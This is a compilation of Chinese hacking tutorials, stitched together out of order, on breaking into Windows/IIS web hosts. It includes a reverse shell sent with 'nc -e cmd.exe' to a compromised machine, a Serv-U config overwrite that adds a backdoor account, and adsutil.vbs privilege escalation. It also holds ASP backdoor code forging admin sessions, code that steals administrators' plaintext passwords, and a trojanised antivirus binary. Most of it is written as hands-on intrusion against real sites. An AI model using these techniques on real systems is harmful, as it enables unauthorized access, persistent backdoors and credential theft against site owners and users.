不可以這么就泄氣了，我突然想到為什么系統(tǒng)不放在C盤了，難道C盤是FAT32分區(qū)的？（后來證明了我們的想法。這里說一下，如果主機(jī)有win98的系統(tǒng)盤，那里99%是FAT32分區(qū)的。我們還遇到過裝有Ghost的主機(jī)，為了方便在DOS下備份，它的備份盤一般都是FAT分區(qū)的。）如果系統(tǒng)盤是FAT32分區(qū)，則網(wǎng)站就沒有什么安全性可言了。雖然C盤不是系統(tǒng)盤，但是我們有執(zhí)行權(quán)限。呵呵，copy srv.exe和nc.exe到c:\\，運(yùn)行 srv.exe "nc.exe –e cmd.exe 202.*.*.* 888",這里的202.*.*.*是我們的肉雞，在這之前我們已經(jīng)在肉雞上運(yùn)行了nc –l –p 888。我們在學(xué)校內(nèi)網(wǎng)里，沒有公網(wǎng)ip，不爽-ing。

我們成功獲得一個(gè)系統(tǒng)shell連上肉雞。（看起來簡單，其實(shí)這里我們也遇到過挫折，我們發(fā)現(xiàn)有些版本的nc居然沒有-e這個(gè)參數(shù)，還以為全世界nc功能都一樣。后來又發(fā)現(xiàn)不同版本的nc互連不成功，會(huì)出現(xiàn)亂碼，沒辦法用。為此，上傳n次，錯(cuò)誤n次，傻了n次，后來終于成功了。做黑客還真得有耐心和恒心。）

高興之余，我們?nèi)圆粷M足，因?yàn)檫@個(gè)shell實(shí)在是太慢了。于是，想用我們最常用的Radmin，其實(shí)管理員一按Alt+Ctrl+Del，看進(jìn)程就能發(fā)現(xiàn)r_server了，但是還是喜歡用它，是因?yàn)椴粫?huì)被查殺。好了，上傳admdll.dll，raddrv.dll，r_server.exe到H:\\long\\sun***\\lemon，再用剛才nc得到的shell把它們copy到d:\\winnt\\system32\\下，分別運(yùn)行：r_server /install , net start r_server , r_server /pass:rain /save 。

一陣漫長的等待，終于顯示成功了。興沖沖用radmin連上去，發(fā)現(xiàn)連接失敗。暈死，忘了有防火墻了。上傳pslist和pskill上去，發(fā)現(xiàn)有backice，木馬克星等。Kill掉他們雖然可以登陸，但服務(wù)器重啟后還是不行，終不是長久之計(jì)呀。防火墻是不防21，80等端口的，于是，我們的思路又回到了serv-u上了。把他的ServUDaemon.ini下載下來，覆蓋本機(jī)的ServUDaemon.ini，在本機(jī)的serv-u上添加一個(gè)用戶名為xr，密碼為rain的系統(tǒng)帳號，加上所有權(quán)限。再用老辦法，上傳，用shell寫入D:\\program files\\serv-u\\里，覆蓋掉原來的ServUDaemon.ini。雖然又等了n長時(shí)間，但是成功了，于是用flashfxp連上，發(fā)生530錯(cuò)誤。郁悶，怎么又失敗了。（根據(jù)經(jīng)驗(yàn)這樣應(yīng)該就可以了，但為什么不行沒有想通，請高手指點(diǎn)。）

不管了，我們重啟serv-u就ok了，怎么重啟呢，開始想用shutdown重啟系統(tǒng)，但那樣我們就失去了nc這個(gè)shell，還可能被發(fā)現(xiàn)。后來，眼睛一亮，我們不是有pskill嗎？剛才用pslist發(fā)現(xiàn)有這個(gè)進(jìn)程：ServUDaemon 。把它kill了。然后再運(yùn)行D:\\program files\\serv-u\\ ServUAdmin.exe ，這里要注意不是ServUDaemon.exe 。

好了，到這里，我們直接ftp上去吧，ls一下，哈哈，系統(tǒng)盤在我的掌握下。我們能不能運(yùn)行系統(tǒng)命令呢？是可以的，這樣就可以：

ftp>quote site exec net user xr rain /add

在webshell上運(yùn)行net user，就可以看見添加成功了。

整個(gè)入侵滲透到這就結(jié)束了，在一陣后清理打掃后。我們就開始討論了。其實(shí)，突破防火墻有很多好的rootkit可以做到的，但是我們覺得系統(tǒng)自帶的服務(wù)才是最安全的后門。

--
asp.dll解析成system提升權(quán)限
網(wǎng)絡(luò)上傳統(tǒng)的提升asp權(quán)限為系統(tǒng)的有兩種:
1.圖形化下的,把默認(rèn)站點(diǎn)---->主目錄--->應(yīng)用程序保護(hù)設(shè)置為低,這樣就可以把a(bǔ)sp權(quán)限設(shè)置為system.
但這種提升方法很容易被發(fā)現(xiàn),所以網(wǎng)絡(luò)有另一種一般是用adsutil.vbs來提升權(quán)限.而這個(gè)也是今天
我要談的關(guān)于adsutil.vbs提升權(quán)限.
2.用adsutil.vbs搞定.
在網(wǎng)絡(luò)上我看到了很多的教你用這種方法的動(dòng)畫,文章,但我至今沒有看到一篇介紹原理的,下面我談?wù)勎覀€(gè)人的看法:
先舉個(gè)例子:
有一群狗,這群狗里有幾個(gè)長老級狗物,它們擁有著至高無上的權(quán)限,而其它的狗,他們的權(quán)限則少得可憐.
轉(zhuǎn)到計(jì)算機(jī)上:
在IIS中,有幾個(gè)Dll文件是擁有特權(quán)限的,我們可以理解為系統(tǒng)權(quán)限,就像長老級的狗.而解析asp的asp.dll則就像一只
普通的狗,他的權(quán)限少得可憐.
那么,如果asp.dll也成了長老級的狗的話,那么asp不也就有了系統(tǒng)權(quán)限了嗎,這是可以成立的.所以我們的思路也就是
把a(bǔ)sp.dll加入特權(quán)的dll一族之中.提升步驟為:
<1>先查看有特權(quán)一話有哪些.
<2>加asp.dll加入特權(quán)一族
好了,下面我們就來實(shí)踐這個(gè)過程.
1)查看有特權(quán)的dll文件:
命令為:cscript adsutil.vbs get /W3SVC/InProcessIsapiApps
得到顯示為:
C:\\Inetpub\\AdminScripts>cscript adsutil.vbs get /W3SVC/InProcessIsapiApps
Microsoft (R) Windows 腳本宿主版本 5.1 for Windows
版權(quán)所有(C) Microsoft Corporation 1996-1999. All rights reserved.
InProcessIsapiApps : (LIST) (5 Items)
"C:\\WINNT\\system32\\idq.dll"
"C:\\WINNT\\system32\\inetsrv\\httpext.dll"
"C:\\WINNT\\system32\\inetsrv\\httpodbc.dll"
"C:\\WINNT\\system32\\inetsrv\\ssinc.dll"
"C:\\WINNT\\system32\\msw3prt.dll"
看到?jīng)]有,他說明的是有特權(quán)限一族為:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
這幾個(gè)文件,不同的機(jī)子,可能會(huì)不同.
2)把a(bǔ)sp.dll加入特權(quán)一族:
因?yàn)閍sp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不同的機(jī)子放的位置不一定相同)
我們現(xiàn)在加進(jìn)去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll"
好了,現(xiàn)在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進(jìn)去
了,注意,用法中的get和set,一個(gè)是查看一個(gè)是設(shè)置.還有就是你運(yùn)行上面的你要到C:\\Inetpub\\AdminScripts>這個(gè)目錄下.
那么如果你是一個(gè)管理員,你的機(jī)子被人用這招把a(bǔ)sp提升為system權(quán)限,那么,這時(shí),防的方法就是把a(bǔ)sp.dll T出特權(quán)一族,也就是用set這個(gè)命令,覆蓋掉剛才的那些東東.
例:cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll"
這樣就可以了,當(dāng)你再用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 這個(gè)語句查之時(shí),如果沒有看見asp.dll,
說明,asp的權(quán)限又恢復(fù)到以前的權(quán)限.

--

　　winNT/2000提升權(quán)限

　　Windows NT/2000 通用的提升方法

　　攻擊者在獲得系統(tǒng)一定的訪問權(quán)限后通常要把自己的權(quán)限提升到管理員組，這樣攻擊者就控制了該計(jì)算機(jī)系統(tǒng)。這主要有以下幾種方法：1.獲得管理員密碼，下次就可以用該密碼進(jìn)入系統(tǒng)； 2. 先新建一個(gè)用戶，然后把這個(gè)普通添加到管理員組，或者干脆直接把一個(gè)不起眼的用戶如guest 添加到管理員組； 3. 安裝后門。

　　本文簡要介紹在 Windows NT4和 Windows 2000 里攻擊者常用的提升權(quán)限的方法。下面是具體方法：

　　方法1 ：下載系統(tǒng)的 %windir%\\repair\\sam.*（WinNT 4 下是sam._ 而Windows2000下是sam ）文件，然后用L0pht 等軟件進(jìn)行破解，只要能拿到，肯花時(shí)間，就一定可以破解。

　　問題：（1 ）攻擊者不一定可以訪問該文件（看攻擊者的身份和管理員的設(shè)置）；（2 ）這個(gè)文件是上次系統(tǒng)備份時(shí)的帳號列表（也可能是第一次系統(tǒng)安裝時(shí)的），以后更改帳號口令的話，就沒用了。

　　方法2 ：使用pwdump（L0pht 自帶的，Windows 2000下無效）或者pwdump2 ，取得系統(tǒng)當(dāng)前的用戶列表和口令加密列表，然后用L0pht 破解這個(gè)列表。

　　問題：普通用戶不能成功運(yùn)行pwdump類程序（沒有權(quán)限），例如：使用unicode漏洞進(jìn)入系統(tǒng)時(shí)是IUSR_computer 身份，該用戶一般只屬于guests組的，運(yùn)行pwdump類程序就會(huì)失敗。

　　（以上兩種是離線的）

　　方法3 ：使用 Enum 等程序進(jìn)行遠(yuǎn)程破解，猜口令。enum可以使用指定的字典對遠(yuǎn)程主機(jī)的某個(gè)用戶進(jìn)行破解。

　　問題：（1 ）如果系統(tǒng)設(shè)置了帳號鎖定的話，破解幾次失敗，該帳號就鎖定了，暫時(shí)不能再破解；（2 ）要遠(yuǎn)程系統(tǒng)開放 Netbios連接，就是 TCP的139 端口，如果用防火墻過濾了的話 Enum 就無法連接到主機(jī)。

　?。ㄒ陨戏椒ㄊ峭ㄟ^破解獲得密碼的，還有直接把當(dāng)前用戶提升權(quán)限或者添加用戶到管理員組的方法。）

　　方法4 ：GetAdmin（WinNT 4 下）、PipeUpAdmin （Windows 2000下），在本機(jī)運(yùn)行可以把當(dāng)前用戶帳號加入管理員組。而 PipeUpAdmin則比較厲害，普通用戶和Guests組用戶都可以成功運(yùn)行。

　　問題：GetAdmin在 SP4有補(bǔ)丁修復(fù)了，不能用于高于 SP4的 WinNT 4系統(tǒng)，當(dāng)然后來又有GetAdmin的增強(qiáng)版本，不過在 SP6a 下好像都不能成功運(yùn)行。

　　注：這一方法利用了 WinNT 4系統(tǒng)的安全漏洞，可以安裝補(bǔ)丁解決這一問題。

　?。ù送膺€有變通的方法。）

　　方法5 ：在WinNT 4 和 Windows 2000 注冊表里指定用戶Shell 程序（Explorer.exe）

　　時(shí)沒有使用絕對路徑，而是使用了一個(gè)相對路徑的文件名（考慮到兼容性問題）。

　　由于在系統(tǒng)啟動(dòng)時(shí)程序的搜索順序問題使得 %Systemdrive%\\Explorer.exe（操作系統(tǒng)安裝的跟目錄下的Explorer.exe）程序執(zhí)行，這提供了攻擊者一個(gè)機(jī)會(huì)在用戶下次登錄時(shí)執(zhí)行他自己的程序。

　　問題：攻擊者必須有安裝系統(tǒng)邏輯盤跟目錄的寫權(quán)限才行，而一般管理員都設(shè)置該目錄普通用戶禁寫。

　　注：這種方法利用了 WinNT 4/Windows 2000 系統(tǒng)的安全漏洞，可以安裝補(bǔ)丁解決這種問題。

　　方法6 ：木馬：上傳木馬，然后運(yùn)行木馬，系統(tǒng)重起動(dòng)后，木馬就是本地登錄用戶的身份了，然后攻擊者連接后就有了本地登錄用戶的權(quán)限。因?yàn)橐话憧偸枪芾韱T本地登錄系統(tǒng)，因此這樣很可能就獲得了管理員的權(quán)限。

　　問題：（1 ）殺毒軟件或病毒防火墻可能阻止木馬運(yùn)行，還有可能把木馬殺死。

　?。? ）有的木馬不能在Guests組身份下運(yùn)行，這可能與它添加自動(dòng)運(yùn)行的方式有關(guān)；如沒有權(quán)限改寫注冊表的自動(dòng)運(yùn)行位置，不能寫入%system%\\system32目錄（一般的木馬都改變文件名，然后寫入系統(tǒng)目錄，如果沒有寫入權(quán)限系統(tǒng)目錄，就不能成功執(zhí)行木馬）。

　　解決：不過也有用壓縮程序（不是通常說的壓縮程序，這種壓縮程序把可執(zhí)行程序壓縮后，文件變小了，但是仍然可以正常執(zhí)行）將木馬壓縮，從而逃過殺毒軟件的特征碼檢測。我曾使用Aspack成功壓縮了一個(gè)木馬，逃過了金山毒霸正式版的檢測。不過也有的木馬Aspack壓縮不了，如冰河。

　　方法7 ：Gina、GinaStub木馬。雖然這個(gè)也叫木馬，但是它的功能和上邊的那種大不相同，因?yàn)橐话愕哪抉R是在對方安裝一個(gè)server端，一旦運(yùn)行就可以使用client端連接到server端，并進(jìn)行操作。而 ginastub 一般只有一個(gè)動(dòng)態(tài)連接庫文件，需要手工安裝和卸載，他的功能也不是使用client端控制server端，它僅僅就是捕獲用戶的登錄密碼。

　　問題：安裝較麻煩，成功的可能性低，而且安裝不當(dāng)會(huì)造成被安裝的系統(tǒng)不能啟動(dòng)。

　　注：這一方法利用的不是系統(tǒng)的安全漏洞，因此不能通過安裝補(bǔ)丁解決這一問題。關(guān)于Gina，可以參見我的另一篇文章《WinLogon登錄管理和GINA簡介》

　　方法8 ：本地溢出。緩沖區(qū)溢出是進(jìn)行攻擊的最好辦法，因?yàn)橐话愣伎梢垣@得系統(tǒng)權(quán)限或者管理員權(quán)限；不過很多遠(yuǎn)程溢出攻擊不需要事先有執(zhí)行程序的權(quán)限，而本地溢出就恰好適合提升權(quán)限。Win NT4 的 IIS4 的 ASP擴(kuò)展有一個(gè)本地溢出漏洞，Windows 2000的靜態(tài)圖像服務(wù)也有一個(gè)溢出漏洞，利用該漏洞，攻擊者可以獲得系統(tǒng)權(quán)限。當(dāng)然 Windows NT 和 Windows 2000 還有很多程序有溢出漏洞，這是這些程序不是總在運(yùn)行，因此被利用的可能性比較小。

　　問題：（1 ）ASP 擴(kuò)展的溢出漏洞需要攻擊者有向網(wǎng)站的腳本目錄的寫權(quán)限，才能把攻擊程序放到網(wǎng)站上，然后執(zhí)行。

　　（2 ）靜態(tài)圖像服務(wù)缺省沒有安裝，只有用戶在 Windows 2000 上安裝靜態(tài)圖像設(shè)備（如數(shù)碼相機(jī)、掃描儀等）時(shí)才自動(dòng)安裝。

　　注：這種方法利用了 WinNT 4/Windows 2000 系統(tǒng)的安全漏洞，可以安裝補(bǔ)丁解決這種問題。

　　Windows 2000專用提升漏洞方法方法1 ： Windows 2000 的輸入法漏洞，利用這個(gè)漏洞任何人可以以LocalSystem 身份執(zhí)行程序，從而可以用來提升權(quán)限，不過該漏洞一般限于物理接觸 Windows 2000 計(jì)算機(jī)的人。當(dāng)然如果開放了終端服務(wù)的話，攻擊者也可以遠(yuǎn)程利用該漏洞。

　　注：這一方法利用了 Windows 2000 系統(tǒng)的安全漏洞，可以安裝補(bǔ)丁解決這一問題。

　　方法2 ：利用 Windows 2000 的 Network DDE DSDM 服務(wù)漏洞普通用戶可以LocalSystem 身份執(zhí)行任意程序，可以借此更改密碼、添加用戶等。Guests組用戶也可以成功利用該漏洞。

　　問題：這個(gè)服務(wù)缺省沒有啟動(dòng)，需要啟動(dòng)這個(gè)服務(wù)。

　　注：這一方法利用了 Windows 2000 系統(tǒng)的安全漏洞，可以安裝補(bǔ)丁解決這一問題。

　　方法3 ：Windows 2000的 TELNET 服務(wù)進(jìn)程建立時(shí)，該服務(wù)會(huì)創(chuàng)建一個(gè)命名管道，并用它來執(zhí)行命令。但是，該管道的名字能被預(yù)見。如果 TELNET 發(fā)現(xiàn)一個(gè)已存在的管道名，它將直接用它。攻擊者利用此漏洞，能預(yù)先建立一個(gè)管道名，當(dāng)下一次 TELNET 創(chuàng)建服務(wù)進(jìn)程時(shí)，便會(huì)在本地 SYSTEM 環(huán)境中運(yùn)行攻擊者代碼。

　　注：這一方法利用了 Windows 2000 系統(tǒng)的安全漏洞，可以安裝補(bǔ)丁解決這一問題。

　　方法4 ：WINDOWS 2K存在一個(gè)利用 Debug Registers提升權(quán)限的漏洞。如果攻擊者能在 WIN2K中運(yùn)行程序，利用此漏洞，他至少能取得對 %Windir%\\SYSTEM32和注冊表HKCR的寫權(quán)。因?yàn)閤86 Debug Registers DR0-7 對于所有進(jìn)程都是全局共享的，因此在一個(gè)進(jìn)程中設(shè)置硬件斷點(diǎn)，將影響其它進(jìn)程和服務(wù)程序。

　　注：這一方法利用了 Windows 2000 系統(tǒng)的安全漏洞，不過到目前為止微軟仍然沒有補(bǔ)丁可以安裝，但是漏洞攻擊程序已經(jīng)出現(xiàn)了，因此只能堵住攻擊者的入口來阻止利用該漏洞。

--

-- 巧妙配合asp木馬取得后臺管理權(quán)限頂(這個(gè)可是經(jīng)典。。。自己體會(huì)我不多說了)

前段時(shí)間泛濫成災(zāi)的動(dòng)網(wǎng)論壇上傳漏洞以及最近接二連三的各種asp系統(tǒng)暴露的上傳漏洞，可能很多朋友手中有了很多webshell的肉雞，至于選擇怎么樣這些小雞的方式也是因人而異，有人繼續(xù)提升權(quán)限，進(jìn)一步入侵，也有人只是看看，馬兒放上去了過了就忘記了，也有一些朋友，當(dāng)webshell的新鮮勁兒過去了后臺的神秘感和誘惑力也就大大增加。其實(shí)，對很多功能強(qiáng)大的系統(tǒng)而言，拿到后臺也就是拿到了一個(gè)好的后門了，呵呵............但是現(xiàn)在比較新的版本的很多asp系統(tǒng)密碼都是MD5加密然后配合嚴(yán)格的驗(yàn)證程序來驗(yàn)證的，但是我們就沒有辦法突破這些限制了嗎？no!我今天就是要說怎么突破這些限制讓我們直奔后臺，有馬兒廄是好辦事，follow
me............
session欺騙篇
首先簡單說一下一般asp系統(tǒng)的身份驗(yàn)證原理。
一般來說，后臺管理員在登錄頁面輸入賬號密碼后，程序會(huì)拿著他提交的用戶名密碼去數(shù)據(jù)庫的管理員表里面找，如果有這個(gè)人的賬號密碼就認(rèn)為你是管理員，然后給你一個(gè)表示你身份的session值?；蛘叱绦蛳劝涯愕挠脩裘艽a提取出來，然后到數(shù)據(jù)庫的管理員表里面取出管理員的賬號密碼來和你提交的相比較，如果相等，就跟上面一樣給你個(gè)表示你身份的sesion值。然后你進(jìn)入任何一個(gè)管理頁面它都要首先驗(yàn)證你的session值，如果是管理員就讓你通過，不是的話就引導(dǎo)你回到登錄頁面或者出現(xiàn)一些奇奇怪怪的警告，這些都跟程序員的個(gè)人喜好有關(guān)。
知道了原理，我們現(xiàn)在的一個(gè)思路就是通過我們的asp木馬來修改它的程序然后拿到一個(gè)管理員session，這樣的話盡管我們沒有管理員密碼，但是我們一樣在后臺通行無阻了。我把這種方法稱為session欺騙。限于篇幅不能每個(gè)系統(tǒng)都能詳細(xì)說明，本文僅以動(dòng)力文章系統(tǒng)為例來說明。
動(dòng)力文章系統(tǒng)3.51，（圖一）

圖一
其實(shí)動(dòng)力文章系統(tǒng)的所有版本全部通殺，包括動(dòng)易。大家可以自己實(shí)踐一下。
我們先來看一下它的驗(yàn)證內(nèi)容。動(dòng)力文章3.51的驗(yàn)證頁面在Admin_ChkLogin.asp
，其驗(yàn)證內(nèi)容如下：
............
else
rs("LastLoginIP")=Request.ServerVariables("REMOTE_ADDR")
rs("LastLoginTime")=now()
rs("LoginTimes")=rs("LoginTimes")+1
rs.update
session.Timeout=SessionTimeout
session("AdminName")=rs("username")
rs.close
set rs=nothing
call CloseConn()
Response.Redirect "Admin_Index.asp"
前面省略號是用戶名密碼不正確的驗(yàn)證，直到else，看一下，如果用戶名密碼正確就給你兩個(gè)session值：
session.Timeout=SessionTimeout
session("AdminName")=rs("username")
我們在看一下其他管理頁面是怎么驗(yàn)證session的，admin_index.asp一開始就這樣：
if session("AdminName") = "" then response.Redirect "Admin_Login.asp"end if
看起來似乎很嚴(yán)密，但是我們看一下，它這里值驗(yàn)證一個(gè)AdminName的session，只要我們的session內(nèi)容是AdminName的話不就可以通過了？好，我們開工，先去弄到它的管理員賬號再說，這個(gè)不要我教你了吧？到他網(wǎng)站逛一下或者直接一點(diǎn)下載它的數(shù)據(jù)庫來看都可以知道。我們找個(gè)頁面來改一下，我找一個(gè)比較沒人而內(nèi)容較多的頁面FriendSite.asp（友情鏈接頁面）來改，呵呵，這樣管理員也很難查得出來啊。用asp木馬的編輯功能來編輯一下它的內(nèi)容。在他頁面下隱蔽處加上下面幾句話：
dim id
id=trim(request("qwe"))
if id="120" then
session("AdminName")="admin" '這里是假設(shè)的，實(shí)際操作中可以改成你想要得管理員賬號
end if
我簡單說一下這句話的意思，就是說從地址欄取得hehe的值，如果hehe=120的話，那么系統(tǒng)就給我們一個(gè)值為admin的session。好了，我們輸入看一下，圖二：

圖二
看到有什么異常嗎，沒有吧？還是正常頁面，但是我們接著在地址欄中輸入它的后臺管理首頁看看，是不是進(jìn)去了？圖三：

圖三
呵呵，別做壞事哦............
小結(jié)一下：我們先找到弄到管理員賬號，然后找到它的驗(yàn)證頁面，根據(jù)它的驗(yàn)證內(nèi)容來寫入我們要的后門。不同的系統(tǒng)有不同的驗(yàn)證方式，比如青創(chuàng)文章系統(tǒng)它不但要驗(yàn)證你的用戶名還要驗(yàn)證等級，但是我們總體思路還是一樣，就是他驗(yàn)證什么我們就加入什么。

密碼竊探篇
可以說上述方法在動(dòng)網(wǎng)論壇或者其他論壇面前是蒼白無力的，因?yàn)橐话阏搲捎诮换バ暂^強(qiáng)，所以在驗(yàn)證上考慮了很多。以動(dòng)網(wǎng)為例，你要登錄后臺，他先驗(yàn)證你有沒有先登錄了前臺，沒有的話就給你返回一個(gè)錯(cuò)誤頁面。你登錄前臺后系統(tǒng)會(huì)給你一個(gè)seession來記錄你的CacheName和你的ID，然后在你登錄后臺的時(shí)候拿出來比較你前后臺身份是否一致，一直就通過，否則kill，面對這樣嚴(yán)格的驗(yàn)證，難道我們就沒有辦法基后臺了嗎？對，沒有了（誰拿雞蛋扔我？這么浪費(fèi)。），但是我們可以想新的辦法，既然驗(yàn)證這么嚴(yán)格，那么我如果拿著密碼光明正大的進(jìn)去呢？因此，這里一個(gè)新的思路就是拿到它的明文密碼。什么時(shí)候有明文密碼呢？對了，就在管理員登錄的時(shí)候。好，我們就在那里做手腳，把它登錄的密碼發(fā)給我們，然后我們拿和它的密碼去登錄。呵呵，是不是很像sniffer??？在下在前幾個(gè)月剛和好兄弟潛龍?jiān)谝袄糜布niffer配合省網(wǎng)安局的人端掉一個(gè)非法電影網(wǎng)站，足足4000G的硬盤，幾十臺服務(wù)器，一個(gè)字：爽
好了，我們開始修改它的程序。編輯login.asp，加入以下幾句話：
if not isnull(trim(request("username"))) then
if request("username")="admin" then
sql="update [Dv_Vser] set UserEmail=(select userpassword from
[Dv_User]
where username=\'"& request("username")&"\') where
UserName=\'aweige\'"
conn.execute(sql)
end if
end if

這幾句話的意思就是說如果admin（假設(shè)的，實(shí)際操作中改為你要的管理員名字）登錄成功就更新數(shù)據(jù)庫，把他的密碼放到我資料的E-mail中。當(dāng)然，你必須先在論壇里注冊一個(gè)用戶名。結(jié)果如圖四：

圖四
還有，如果是動(dòng)網(wǎng)7.0以下的默認(rèn)數(shù)據(jù)庫admin表名和7.0以上有點(diǎn)不一樣，所以實(shí)際操作中不可生搬硬套。

后記：
對于以上兩種方法直到目前為止我還想不出任何比較有效的解決方法，因?yàn)槟愕木W(wǎng)站被人家放了馬，你根本就沒辦法去阻止人家去插入，要是誰有好的解決方法記得告訴我。

另外，希望大家不要去搞破壞，那時(shí)我真的不愿看到的，也祝所有的網(wǎng)管們好運(yùn)，希望你們不會(huì)碰上craker們。

--
--

巧用asp木馬和KV2004得到管理員權(quán)限

重來沒寫過什么文章，這是第一次，寫的不好請大家原諒，高手也不要取笑哦。這里也沒什么技術(shù)可言，只是我這個(gè)菜鳥的一點(diǎn)心得，ok開始。。。
前段時(shí)間動(dòng)網(wǎng)的UPfile.asp漏洞可謂鬧的沸沸揚(yáng)揚(yáng)，這個(gè)漏洞確實(shí)很厲害，相信不少新手和我一樣種了不少后門在有動(dòng)網(wǎng)的網(wǎng)站上，但是asp木馬的權(quán)限確實(shí)很底，除了刪點(diǎn)文章，刪點(diǎn)圖片好象沒什么用了。不行不得到管理員權(quán)限簡直就辜負(fù)了發(fā)現(xiàn)這個(gè)漏洞的高手們~v~。好，想辦法提升權(quán)限，我找啊找！網(wǎng)上提升權(quán)限的方法幾乎都用過了，都沒什么用，補(bǔ)丁打的很全啊！接下來用findpass想解開管理員的密碼，又失敗，findpass要管理員權(quán)限才有用。用pslist看看暈裝的是瑞星+天網(wǎng)，網(wǎng)上的大部分工具遇上這個(gè)防御組合一般都沒用了。種木馬？不行一來
權(quán)限太底，二來在瑞星殺天網(wǎng)堵的包圍下很少能活出來的。做個(gè)添加用戶權(quán)限的bat文件想放到啟動(dòng)組中去，這個(gè)方法雖然有點(diǎn)傻但是有一定的可行性，暈又是權(quán)限不夠加不進(jìn)去。c盤下的"Program Files" "winnt" "Documents and Settings"三個(gè)文件甲都沒有寫權(quán)限，更不要說注冊表了。郁悶了，給管理員留了句話，然后匆匆下線。
第2天上來一看，嘿嘿圖被改回來了，管理員應(yīng)該發(fā)現(xiàn)了，這次更不容易得手。登上asp木馬進(jìn)去看了一下，昨天傳上去的幾個(gè)exe被刪了，還好asp木馬活下來了，咦！c盤多了文件甲叫KV2004，原來管理員把瑞星卸了，安了個(gè)kv2004，進(jìn)Program Files看看確實(shí)瑞星被卸了。（這里說一下，大部分的殺毒軟件默認(rèn)的安裝路徑c:\\Program Files\\,但是kv默認(rèn)的安裝路徑是c:\\kv2004\\）到這里機(jī)會(huì)就來了我們可以把執(zhí)行文件捆綁在kv2004上，跟隨kv一起啟動(dòng)。因?yàn)閗v不在"Program Files" "winnt" "Documents and Settings"這三個(gè)文件甲中，很大可能我可以修改

或者上傳文件。行動(dòng)！在kv2004下隨便找個(gè)htm文件刪除：(看看有無寫刪權(quán)限）
C:\\>del c:\\kv2004\\GetLicense.htm
拒絕訪問

奇怪了，再來看看文件甲屬性
C:\\>attrib c:\\kv2004
S R C:\\KV2004

哦是只讀。
C:\\>attrib -r -s c:\\kv2004

ok！在試試
C:\\>del c:\\kv2004\\GetLicense.htm

成功了！好寫個(gè)起用帳號和提升權(quán)限的bat文件，然后把bat文件和kv2004的系統(tǒng)服務(wù)文件KVSrvXP.exe捆綁起來，（注意多下種捆綁器，捆綁一

次用kv2004來掃描一次，因?yàn)楹芏嗬壠魃傻奈募v會(huì)把他作為病毒來處理掉）準(zhǔn)備上傳了，先刪掉原來的KVSrvXP.exe。
C:\\>del c:\\kv2004\\KVSrvXP.exe
拒絕訪問

可能是KVSrvXP.exe被windows調(diào)用中，刪不掉。沒辦法了嗎？不，刪不掉我改名
C:\\>ren c:\\kv2004\\KVSrvXP.exe kv.exe

OK!然后用asp木馬把修改了的KVSrvXP.exe上傳到kv2004中，接下來就去睡覺把。
4個(gè)小時(shí)后登上來用：
net user 起用的帳戶

已經(jīng)在administrators組中，接下來要關(guān)防火墻，關(guān)殺毒軟件，還是種木馬你隨便我了，哈哈！
我覺得入侵沒什么固定的模式，具體情況具體分析，殺毒軟件同樣也可以幫我們忙，這里我只提供了一種思路。請大家指教。

如何繞過防火墻提升權(quán)限

本文講的重點(diǎn)是webshell權(quán)限的提升和繞過防火墻，高手勿笑。

廢話少說，咱們進(jìn)入正題。

首先確定一下目標(biāo)：http://www.sun***.com ，常見的虛擬主機(jī)。利用Upfile的漏洞相信大家獲得webshell不難。我們這次獲得這個(gè)webshell，不是DVBBS，而是自由動(dòng)力3.6的軟件上傳過濾不嚴(yán)。網(wǎng)站http://www.sun***.com/lemon/Index.asp是自由動(dòng)力3.6文章系統(tǒng)。Xr運(yùn)用WinHex.exe和WSockExpert.exe上傳一個(gè)網(wǎng)頁木馬newmm.asp，用過動(dòng)鯊的door.exe的人都知道，這個(gè)是上傳asp木馬內(nèi)容的。于是，上傳海洋2005a，成功獲得webshell。

測試一下權(quán)限，在cmd里運(yùn)行set，獲得主機(jī)一些信息，系統(tǒng)盤是D盤，也說明了我們的webshell有運(yùn)行權(quán)限的。那我們看看C盤有什么呢？難道是雙系統(tǒng)？瀏覽后發(fā)現(xiàn)沒有什么系統(tǒng)文件，只有一些垃圾文件，暈死。沒關(guān)系，再來檢查一下，虛擬主機(jī)都有serv-u的，這臺也不例外，是5.0.0.8的。呵呵，是有本地溢出的呀，挖哈哈。

思路：上傳serv-u本地溢出文件srv.exe和nc.exe利用nc來反連接獲得系統(tǒng)shell。大家是不是發(fā)現(xiàn)海洋2005a那個(gè)上傳的組件不好用（反正我總遇到這個(gè)問題），沒關(guān)系，用rain改的一個(gè)無組件上傳，一共有3個(gè)文件，up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上傳到同一個(gè)文件夾，up.htm是本地用的，修改up.htm里的鏈接地址為：http://www.sun***.com/lemon/upload.asp就可以上傳了。

傳上了srv.exe和nc.exe在H:\\long\\sun***\\lemon（網(wǎng)站目錄）后，發(fā)現(xiàn)沒有運(yùn)行權(quán)限。沒關(guān)系，根據(jù)經(jīng)驗(yàn)，一般系統(tǒng)下D:\\Documents and Settings\\All Users\\是應(yīng)該有運(yùn)行權(quán)限的。于是想把文件copy過去，但是發(fā)現(xiàn)我們的webshell沒有對D盤寫的權(quán)限，暈死。

可以瀏覽D:\\program files\\serv-u\\ServUDaemon.ini,不能改，難道要破解serv-u的密碼，暈，不想。

